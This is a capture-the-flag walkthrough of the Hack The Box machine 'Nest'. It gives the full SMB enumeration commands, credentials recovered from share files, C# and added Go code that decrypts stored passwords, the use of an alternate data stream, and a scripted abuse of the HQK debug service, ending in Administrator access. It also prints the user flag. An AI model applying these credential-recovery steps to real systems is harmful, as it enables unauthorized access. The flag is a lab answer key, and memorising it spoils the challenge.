Nest is a Windows box that saw the light of day on Hack The Box on January 25, 2020. A nice box where you are constantly exploring and taking a step further every time. There is a lot of discussion about the difficulty of this box: according to the maker it qualifies as "Easy", but many find it somewhere between "Medium" and "Hard".

[0x1] Reconnaissance & Enumeration
The first step in exploring Nest is an Nmap scan. I opt for a scan of the full port range (including non-standard ports) with the default scripts and service/version detection.
nmap -sC -sV -p- -oA nest 10.10.10.178
A scan of the entire port range always takes a while. Eventually the results come in: ports 445/tcp and 4386/tcp are open. 445/tcp is SMB; 4386/tcp is unknown to me, but according to the service fingerprint a reporting service that runs queries against databases is listening there.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-26 19:51 GMT
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 11.33% done; ETC: 19:56 (0:03:55 remaining)
Stats: 0:05:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 19:57 (0:00:21 remaining)
Nmap scan report for 10.10.10.178
Host is up (0.021s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Reporting Service V1.2
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
| Reporting Service V1.2
| Unrecognised command
| Help:
| Reporting Service V1.2
| This service allows users to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS ---
| LIST
| SETDIR <Directory_Name>
| RUNQUERY <Query_ID>
| DEBUG <Password>
|_ HELP <Command>
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-01-26T19:59:26
|_ start_date: 2020-01-26T19:44:36
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 507.00 seconds
With smbclient a number of shares emerge; the listing works without credentials (an empty password at the prompt is enough). Besides the standard ADMIN$, C$ and IPC$ we see a few interesting shares.
smbclient -L 10.10.10.178
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup available
[0x2] Initial Foothold
Based on this list I am going to take a closer look at Data, Secure$ and Users to see whether any interesting information can be found. An initial foothold is good, but a set of credentials is of course better.
The Users share contains a number of user folders, presumably for users whose credentials can be found. For now I lack the rights to list their contents. On to Data.
smbclient \\\\10.10.10.178\\users
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Sat Jan 25 23:04:21 2020
.. D 0 Sat Jan 25 23:04:21 2020
Administrator D 0 Fri Aug 9 16:08:23 2019
C.Smith D 0 Sun Jan 26 07:21:44 2020
L.Frost D 0 Thu Aug 8 18:03:01 2019
R.Thompson D 0 Thu Aug 8 18:02:50 2019
TempUser D 0 Wed Aug 7 23:55:56 2019
\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*
\C.Smith
NT_STATUS_ACCESS_DENIED listing \C.Smith\*
\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*
\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*
\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*
smb: \>
The Data share contains a number of nested folders and files. The recurse command is useful here to get a complete listing in one go.
smbclient \\\\10.10.10.178\\data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Wed Aug 7 23:53:46 2019
.. D 0 Wed Aug 7 23:53:46 2019
IT D 0 Wed Aug 7 23:58:07 2019
Production D 0 Mon Aug 5 22:53:38 2019
Reports D 0 Mon Aug 5 22:53:44 2019
Shared D 0 Wed Aug 7 20:07:51 2019
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
\Production
NT_STATUS_ACCESS_DENIED listing \Production\*
\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*
\Shared
. D 0 Wed Aug 7 20:07:51 2019
.. D 0 Wed Aug 7 20:07:51 2019
Maintenance D 0 Wed Aug 7 20:07:32 2019
Templates D 0 Wed Aug 7 20:08:07 2019
\Shared\Maintenance
. D 0 Wed Aug 7 20:07:32 2019
.. D 0 Wed Aug 7 20:07:32 2019
Maintenance Alerts.txt A 48 Tue Aug 6 00:01:44 2019
\Shared\Templates
. D 0 Wed Aug 7 20:08:07 2019
.. D 0 Wed Aug 7 20:08:07 2019
HR D 0 Wed Aug 7 20:08:01 2019
Marketing D 0 Wed Aug 7 20:08:06 2019
\Shared\Templates\HR
. D 0 Wed Aug 7 20:08:01 2019
.. D 0 Wed Aug 7 20:08:01 2019
Welcome Email.txt A 425 Wed Aug 7 23:55:36 2019
\Shared\Templates\Marketing
. D 0 Wed Aug 7 20:08:06 2019
.. D 0 Wed Aug 7 20:08:06 2019
smb: \>
Maintenance Alerts.txt and Welcome Email.txt look interesting for later.
The last share, Secure$, accepts the connection but it is not possible to list files there. Maybe later with a set of credentials.
smbclient \\\\10.10.10.178\\secure$
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
Maintenance Alerts.txt only contains a message that there is no maintenance scheduled, which is of no use to me. The second file, Welcome Email.txt, is more interesting.
\shared\Templates\HR\> dir
. D 0 Wed Aug 7 20:08:01 2019
.. D 0 Wed Aug 7 20:08:01 2019
Welcome Email.txt A 425 Wed Aug 7 23:55:36 2019
10485247 blocks of size 4096. 6448917 blocks available
The file Welcome Email.txt contains a set of credentials for TempUser, a user whose folder was seen earlier on the Users share:
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019
Thank you
HR
[0x3] Path to User flag
Armed with freshly discovered credentials, it is time to reconnect to the Data share as TempUser to see whether it reveals more.
The listing shows quite a few files in the IT\Configs folder that look like application configuration files.
smbclient -U TempUser \\\\10.10.10.178\\data
Enter WORKGROUP\TempUser's password:
\IT\Configs\NotepadPlusPlus
. D 0 Wed Aug 7 20:31:37 2019
.. D 0 Wed Aug 7 20:31:37 2019
config.xml A 6451 Thu Aug 8 00:01:25 2019
shortcuts.xml A 2108 Wed Aug 7 20:30:27 2019
\IT\Configs\RU Scanner
. D 0 Wed Aug 7 21:01:13 2019
.. D 0 Wed Aug 7 21:01:13 2019
RU_config.xml A 270 Thu Aug 8 20:49:37 2019
10485247 blocks of size 4096. 6448917 blocks available
After going through all the files I found a lot of noise and two interesting files. Enumeration is a tedious task, and before you know it you miss something essential.
In the NotepadPlusPlus folder, config.xml contains a recent-files history that references three other files. Remarkable is the path on the Secure$ share that I visited earlier without being able to list any folders; now I have a path where a folder Carl should exist. Is the user folder C.Smith seen earlier Carl's?
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
The second interesting file is RU_Config.xml in the RU Scanner folder. It holds a username and a password. A quick check shows that the password is not directly usable: it is a Base64 string, most likely an encrypted value rather than the password itself.
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
Time to take a look at the path in the NotepadPlusPlus config file.
smbclient -U TempUser \\\\10.10.10.178\\Secure$
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Thu Aug 8 00:08:12 2019
.. D 0 Thu Aug 8 00:08:12 2019
Finance D 0 Wed Aug 7 20:40:13 2019
HR D 0 Thu Aug 8 00:08:11 2019
IT D 0 Thu Aug 8 11:59:25 2019
\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\HR
NT_STATUS_ACCESS_DENIED listing \HR\*
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
The path of the file should be \\HTB-NEST\Secure$\IT\Carl\Temp.txt. This kept me busy for a while before I simply tried to cd into the directory despite the ACCESS_DENIED. As it turns out, TempUser is allowed to traverse IT but not to list its contents, while inside IT\Carl everything is readable. And that does provide interesting new content.
smb: \IT\> cd Carl
smb: \IT\Carl\> recurse
smb: \IT\Carl\> dir
. D 0 Wed Aug 7 20:42:14 2019
.. D 0 Wed Aug 7 20:42:14 2019
Docs D 0 Wed Aug 7 20:44:00 2019
Reports D 0 Tue Aug 6 14:45:40 2019
VB Projects D 0 Tue Aug 6 15:41:55 2019
10485247 blocks of size 4096. 6448903 blocks available
smb: \IT\Carl\>
RU Scanner was the folder that contained the encrypted password, and under VB Projects\WIP\RU there is a Visual Studio project named RUScanner, which I download in its entirety to investigate in Visual Studio. The expectation is that the encryption routine can be found here, and with it a way to recover the plaintext password.
smb: \IT\Carl\VB Projects\WIP\RU\> dir
. D 0 Fri Aug 9 16:36:45 2019
.. D 0 Fri Aug 9 16:36:45 2019
RUScanner D 0 Wed Aug 7 23:05:54 2019
RUScanner.sln A 871 Tue Aug 6 15:45:36 2019
10485247 blocks of size 4096. 6448903 blocks available
After some tinkering with the project it soon became clear that the easiest way to retrieve the password is to call the project's own decryption function and write its output to the console.
In Module1.vb I add the line below; DecryptString returns a String, so it can be printed directly. RU_Config.xml is loaded from the working directory, so the copy from the Data share has to sit next to the built executable.
Console.WriteLine(Utils.DecryptString(Config.Password))
The whole module then looks like this:
Module Module1
    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
        ' Added line: print the decrypted password instead of only handing it to SsoIntegration
        Console.WriteLine(Utils.DecryptString(Config.Password))
    End Sub
End Module
The decryption function itself lives in Utils.vb and takes the encrypted text, a passphrase, a salt, an iteration count, an initialisation vector and a key size: the passphrase and salt go through a key derivation to produce the AES key, and the Base64 ciphertext is then decrypted in CBC mode. It is the same parameter set as the RD routine decompiled from HqkLdap.exe later on.
The program runs and returns a string as the decrypted password. That looks plausible:
xRxRxPANCAK3SxRxRx

This password works with the username C.Smith, and via smbclient I reconnect to the Users share to continue searching.
The listing shows some interesting things: user.txt and Debug Mode Password.txt.
smbclient -U "C.Smith" \\\\10.10.10.178\\Users
Enter WORKGROUP\C.Smith's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Sat Jan 25 23:04:21 2020
.. D 0 Sat Jan 25 23:04:21 2020
Administrator D 0 Fri Aug 9 16:08:23 2019
C.Smith D 0 Sun Jan 26 07:21:44 2020
L.Frost D 0 Thu Aug 8 18:03:01 2019
R.Thompson D 0 Thu Aug 8 18:02:50 2019
TempUser D 0 Wed Aug 7 23:55:56 2019
\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*
\C.Smith
. D 0 Sun Jan 26 07:21:44 2020
.. D 0 Sun Jan 26 07:21:44 2020
HQK Reporting D 0 Fri Aug 9 00:06:17 2019
user.txt A 32 Fri Aug 9 00:05:24 2019
\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*
\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*
\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*
\C.Smith\HQK Reporting
. D 0 Fri Aug 9 00:06:17 2019
.. D 0 Fri Aug 9 00:06:17 2019
AD Integration Module D 0 Fri Aug 9 13:18:42 2019
Debug Mode Password.txt A 0 Fri Aug 9 00:08:17 2019
HQK_Config_Backup.xml A 249 Fri Aug 9 00:09:05 2019
\C.Smith\HQK Reporting\AD Integration Module
. D 0 Fri Aug 9 13:18:42 2019
.. D 0 Fri Aug 9 13:18:42 2019
HqkLdap.exe A 17408 Thu Aug 8 00:41:16 2019
smb: \>
user.txt indeed holds the user flag, and with that the first part of this machine is in the pocket!
cat user.txt
cf71b25404be5d84fd827e05f426e987
[0x4] Path to Root flag
The Debug Mode Password.txt file is listed with a size of 0 bytes, and after downloading it is indeed empty, which is odd. This is a Windows machine, and a frequently used way of hiding information in a file on NTFS is an Alternate Data Stream (ADS): besides its default (unnamed) data stream a file can carry additional named streams, and normal directory listings and the reported file size only show the default stream.
With smbclient the allinfo command displays the extended attributes of a file, including its streams. This almost has to be a file with an ADS.
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
stream: [:Password:$DATA], 15 bytes
Gotcha! There is an extra stream in the dummy file, named Password. smbclient can download a named stream with the file:stream syntax, exactly as allinfo lists it.
get "Debug Mode Password.txt:Password"
Now the file is 15 bytes instead of 0 bytes. The file contains another password.
WBQ201953D8w
Because many files hint at reporting, it is time to visit Nest's second port. Port 4386 already returned several commands and some basic information during the scan, so I connect to it with telnet.
Once connected I issue help and soon see the next step: there is a DEBUG command that requires a password.
telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
Activating debug mode with the password found in the ADS succeeds, and additional commands become available.
>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
The list command shows that I am in the ALL QUERIES folder. There is nothing else to do here.
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] COMPARISONS
[1] Invoices (Ordered By Customer)
[2] Products Sold (Ordered By Customer)
[3] Products Sold In Last 30 Days
After fiddling with the commands I find that setdir .. goes up one directory and list then shows the contents of that folder. Nothing here is of use except for the LDAP folder.
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml
Current Directory: HQK
In the LDAP folder I find the executable that I encountered earlier in C.Smith's folder on the Users share, and a config file.
>setdir LDAP
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: LDAP
With showquery <id> I can retrieve the content of Ldap.conf, which holds the username Administrator and his password. Like before, this looks encrypted (same Base64 format), and a quick check confirms it cannot be used to log in directly in this form.
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
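The telnet session is a plain line protocol, so the same steps can be scripted once a debug password is known. Below is an added Go example, not code from the original post nor from the HQK service: a client that frames each reply on the ">" prompt and replays DEBUG, SETDIR .., SETDIR LDAP and SHOWQUERY 2, plus a constructed stand-in for the service (fakeHqk) so the exchange runs offline over net.Pipe. The prompt framing and the service's reply to a wrong DEBUG password are assumptions; against the real box, replace the pipe with net.Dial("tcp", "10.10.10.178:4386").

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"net"
	"strings"
)

// readToPrompt collects HQK output up to the next ">" prompt. Assumption taken
// from the telnet transcript: the prompt is a ">" at the start of a line, so the
// ">" inside "SETDIR <Directory_Name>" is not mistaken for one.
func readToPrompt(r *bufio.Reader) (string, error) {
	var out []byte
	for lineStart := true; ; {
		b, err := r.ReadByte()
		if err != nil {
			return string(out), err
		}
		if b == '>' && lineStart {
			return strings.TrimSpace(string(out)), nil
		}
		lineStart = b == '\n'
		out = append(out, b)
	}
}

// FetchLdapPassword replays the walkthrough on an open connection to 4386/tcp
// and returns the still-encrypted Password= value from Ldap.conf.
func FetchLdapPassword(conn net.Conn, debugPassword string) (string, error) {
	r, w := bufio.NewReader(conn), bufio.NewWriter(conn)
	reply, err := readToPrompt(r) // banner
	cmds := []string{"DEBUG " + debugPassword, "SETDIR ..", "SETDIR LDAP", "SHOWQUERY 2"}
	for i := 0; i < len(cmds) && err == nil; i++ {
		w.WriteString(cmds[i] + "\n")
		if err = w.Flush(); err == nil {
			reply, err = readToPrompt(r)
		}
		if i == 0 && err == nil && !strings.HasPrefix(reply, "Debug mode enabled") {
			err = errors.New("DEBUG rejected: " + reply) // stop before leaking more commands
		}
	}
	if err != nil {
		return "", err
	}
	for _, line := range strings.Split(reply, "\n") {
		if line = strings.TrimSpace(line); strings.HasPrefix(line, "Password=") {
			return strings.TrimPrefix(line, "Password="), nil
		}
	}
	return "", errors.New("no Password= line in SHOWQUERY 2 output")
}

// fakeHqk is a constructed stand-in for the service so the client runs offline.
// Its replies copy the transcript for the commands used above; it is not the
// service's code, and "Unrecognised command" for a bad DEBUG password is assumed.
func fakeHqk(conn net.Conn, debugPassword string) {
	defer conn.Close()
	r, w := bufio.NewReader(conn), bufio.NewWriter(conn)
	send := func(s string) { w.WriteString(s + "\n>"); w.Flush() }
	send("HQK Reporting Service V1.2\n")
	debug, dir := false, "ALL QUERIES"
	for {
		line, err := r.ReadString('\n')
		if err != nil {
			return
		}
		f := strings.Fields(line)
		switch {
		case len(f) == 2 && strings.EqualFold(f[0], "DEBUG") && f[1] == debugPassword:
			debug = true
			send("Debug mode enabled. Use the HELP command to view additional commands that are now available")
		case len(f) == 2 && strings.EqualFold(f[0], "SETDIR"):
			if dir = f[1]; dir == ".." {
				dir = "HQK"
			}
			send("Current directory set to " + dir)
		case debug && dir == "LDAP" && len(f) == 2 && strings.EqualFold(f[0], "SHOWQUERY") && f[1] == "2":
			send("Domain=nest.local\nPort=389\nUser=Administrator\nPassword=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=")
		default:
			send("Unrecognised command")
		}
	}
}

// Demo wires client and fake service together over an in-memory pipe.
func Demo(debugPassword string) (string, error) {
	client, server := net.Pipe()
	defer client.Close()
	go fakeHqk(server, "WBQ201953D8w")
	return FetchLdapPassword(client, debugPassword)
}

func main() {
	blob, err := Demo("WBQ201953D8w")
	fmt.Println("Ldap.conf Password= (encrypted):", blob, err)
}
```

The client stops at the first command whose reply is not what the transcript shows, so a wrong debug password is reported instead of silently walking on with the remaining commands.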
I previously saved the Windows executable from C.Smith's folder, and this is probably the program that reads Ldap.conf, so it should also contain the decryption routine.
\C.Smith\HQK Reporting\AD Integration Module
. D 0 Fri Aug 9 13:18:42 2019
.. D 0 Fri Aug 9 13:18:42 2019
HqkLdap.exe A 17408 Thu Aug 8 00:41:16 2019
Since this is a compiled executable, it took some time googling for a free tool that can give insight into it. I used dotPeek from JetBrains. After opening the file I soon came across similarities to the earlier Visual Basic project and found the decryption function.


I could not modify the binary itself to repeat the trick from the Visual Studio project, so I copied the relevant decompiled code into an online .NET compiler and added a Main that feeds the encrypted password to the function and prints the outcome.
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace HqkLdap
{
    public class CR
    {
        // Constants as decompiled; DS() passes the same values again as literals.
        private const string K = "667912";            // passphrase
        private const string I = "1L1SA61493DRV53Z";  // initialisation vector, 16 ASCII bytes
        private const string SA = "1313Rf99";         // salt

        public static string DS(string EncryptedString)
        {
            return string.IsNullOrEmpty(EncryptedString)
                ? string.Empty
                : CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
        }

        private static string RD(
            string cipherText,
            string passPhrase,
            string saltValue,
            int passwordIterations,
            string initVector,
            int keySize)
        {
            byte[] bytes1 = Encoding.ASCII.GetBytes(initVector);
            byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
            byte[] buffer = Convert.FromBase64String(cipherText);
            // PBKDF2 (Rfc2898DeriveBytes, HMAC-SHA1) with 3 iterations turns passphrase and salt into a 256-bit AES key
            byte[] bytes3 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations)
                .GetBytes(checked((int) Math.Round(unchecked((double) keySize / 8.0))));
            // AES in CBC mode with the default PKCS#7 padding
            AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();
            cryptoServiceProvider.Mode = CipherMode.CBC;
            ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor(bytes3, bytes1);
            MemoryStream memoryStream = new MemoryStream(buffer);
            CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, decryptor, CryptoStreamMode.Read);
            byte[] numArray = new byte[checked(buffer.Length + 1)];
            int count = cryptoStream.Read(numArray, 0, numArray.Length);
            memoryStream.Close();
            cryptoStream.Close();
            return Encoding.ASCII.GetString(numArray, 0, count);
        }

        // Added entry point: decrypt the value from Ldap.conf and print it
        public static void Main()
        {
            Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
        }
    }
}
The last line, shown separately below, is all it takes to decrypt the string and show the original password.
Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
"Thanks for playing": a password with a friendly note from the box author. Given the User=Administrator line in Ldap.conf, this should be the Administrator password.
XtH4nkS4Pl4y1nGX
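Rebuilding RD() outside .NET avoids the online compiler and doubles as a check on the recovered parameters. The following is an added Go example, not code from the original post or from HqkLdap.exe: it implements the same key derivation (PBKDF2 with HMAC-SHA1, which is what Rfc2898DeriveBytes does) and AES-256-CBC decryption with PKCS#7 padding using the constants decompiled above, and ExtractPassword pulls the Base64 value out of either the <Password> element of RU_Config.xml or the Password= line of Ldap.conf. The parameters that RUScanner's Utils.vb uses for the c.smith value are not reproduced on this page; with them, a second Params value can be passed to Decrypt in the same way.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// Params mirrors the arguments RD() receives in HqkLdap.exe. .NET's
// Rfc2898DeriveBytes is PBKDF2 with HMAC-SHA1, and AesCryptoServiceProvider
// in CBC mode pads with PKCS#7 by default; salt and IV are raw ASCII bytes.
type Params struct {
	PassPhrase string
	Salt       string
	Iterations int
	IV         string // exactly 16 ASCII characters
	KeySize    int    // bits
}

// HqkLdapParams are the constants decompiled from HqkLdap.exe above.
var HqkLdapParams = Params{"667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256}

// pbkdf2SHA1 is PBKDF2 (RFC 8018) with HMAC-SHA1, written out so the example
// needs nothing outside the Go standard library.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) []byte {
	var dk []byte
	for block := uint32(1); len(dk) < keyLen; block++ {
		mac := hmac.New(sha1.New, password)
		mac.Write(salt)
		mac.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := mac.Sum(nil)              // U1 = PRF(P, S || INT(i))
		t := append([]byte(nil), u...) // T = U1 xor U2 xor ... xor Uc
		for i := 1; i < iter; i++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		dk = append(dk, t...)
	}
	return dk[:keyLen]
}

// Decrypt reproduces RD(): Base64 -> AES-CBC -> strip PKCS#7 padding. Wrong
// key material (passphrase, salt or IV) almost always ends in a padding error.
func Decrypt(b64 string, p Params) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(strings.TrimSpace(b64))
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 || len(p.IV) != aes.BlockSize {
		return "", errors.New("ciphertext must be whole AES blocks and the IV 16 bytes")
	}
	block, err := aes.NewCipher(pbkdf2SHA1([]byte(p.PassPhrase), []byte(p.Salt), p.Iterations, p.KeySize/8))
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(p.IV)).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad < 1 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", errors.New("bad PKCS#7 padding: wrong passphrase, salt or IV?")
	}
	return string(pt[:len(pt)-pad]), nil
}

var (
	xmlPassword  = regexp.MustCompile(`(?is)<Password>\s*([^<]*?)\s*</Password>`)
	confPassword = regexp.MustCompile(`(?im)^\s*Password\s*=\s*(\S+)`)
)

// ExtractPassword pulls the Base64 blob out of either format seen on the box:
// the <Password> element of RU_Config.xml or the Password= line of Ldap.conf.
func ExtractPassword(config string) (string, bool) {
	for _, re := range []*regexp.Regexp{xmlPassword, confPassword} {
		if m := re.FindStringSubmatch(config); m != nil {
			return m[1], true
		}
	}
	return "", false
}

func main() {
	// Constructed copy of the relevant Ldap.conf lines returned by SHOWQUERY 2.
	blob, _ := ExtractPassword("User=Administrator\nPassword=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=\n")
	pw, err := Decrypt(blob, HqkLdapParams)
	fmt.Println("Administrator password:", pw, err)
}
```

A wrong passphrase, salt or IV normally surfaces as a padding error rather than as garbage output, which is the quickest signal that a constant was copied incorrectly from the decompiler.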
With the newly acquired password I connect to the Users share as Administrator and go to the Administrator folder. There is a file, but the name already gives away that this is not the root flag itself.
smbclient -U "Administrator" \\\\10.10.10.178\\Users
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Administrator
smb: \Administrator\> dir
. D 0 Fri Aug 9 16:08:23 2019
.. D 0 Fri Aug 9 16:08:23 2019
flag.txt - Shortcut.lnk A 2384 Fri Aug 9 16:10:15 2019
The shortcut points to flag.txt on the Administrator's Desktop, which is where root.txt is expected.
\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt
A new connection, this time to the C$ share, and through to the Administrator's Desktop for the root flag. Yep, root.txt is there, 32 bytes, and contains the root flag!
smbclient -U "Administrator" \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> dir
. DR 0 Sun Jan 26 07:20:50 2020
.. DR 0 Sun Jan 26 07:20:50 2020
desktop.ini AHS 282 Sat Jan 25 22:02:44 2020
root.txt A 32 Mon Aug 5 23:27:26 2019
10485247 blocks of size 4096. 6449467 blocks available
All information in this post is for educational use only! Do not use it against others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!